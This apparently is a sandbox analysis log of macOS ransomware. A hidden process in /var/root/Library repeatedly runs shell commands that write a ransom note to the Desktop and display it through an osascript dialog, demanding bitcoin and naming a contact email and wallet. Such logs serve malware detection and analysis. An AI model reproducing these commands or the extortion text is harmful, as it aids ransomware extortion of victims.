Source: /var/root/Library/.FS_Store (PID: 785)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 788)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__17
Source: /var/root/Library/.FS_Store (PID: 788)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 791)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__18
Source: /var/root/Library/.FS_Store (PID: 791)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 794)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__19
Source: /var/root/Library/.FS_Store (PID: 794)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 797)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__20
Source: /var/root/Library/.FS_Store (PID: 797)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 800)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__21
Source: /var/root/Library/.FS_Store (PID: 800)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 803)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__22
Source: /var/root/Library/.FS_Store (PID: 803)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 806)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__23
Source: /var/root/Library/.FS_Store (PID: 806)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 809)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__24
Source: /var/root/Library/.FS_Store (PID: 809)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 812)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__25
Source: /var/root/Library/.FS_Store (PID: 812)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 815)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__26
Source: /var/root/Library/.FS_Store (PID: 815)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 818)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__27
Source: /var/root/Library/.FS_Store (PID: 818)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 821)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__28
Source: /var/root/Library/.FS_Store (PID: 821)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 824)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__29
Source: /var/root/Library/.FS_Store (PID: 824)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 827)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__30
Source: /var/root/Library/.FS_Store (PID: 827)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 830)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__31
Source: /var/root/Library/.FS_Store (PID: 830)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 833)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__32
Source: /var/root/Library/.FS_Store (PID: 833)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 836)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__33
Source: /var/root/Library/.FS_Store (PID: 836)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 839)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__34
Source: /var/root/Library/.FS_Store (PID: 839)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
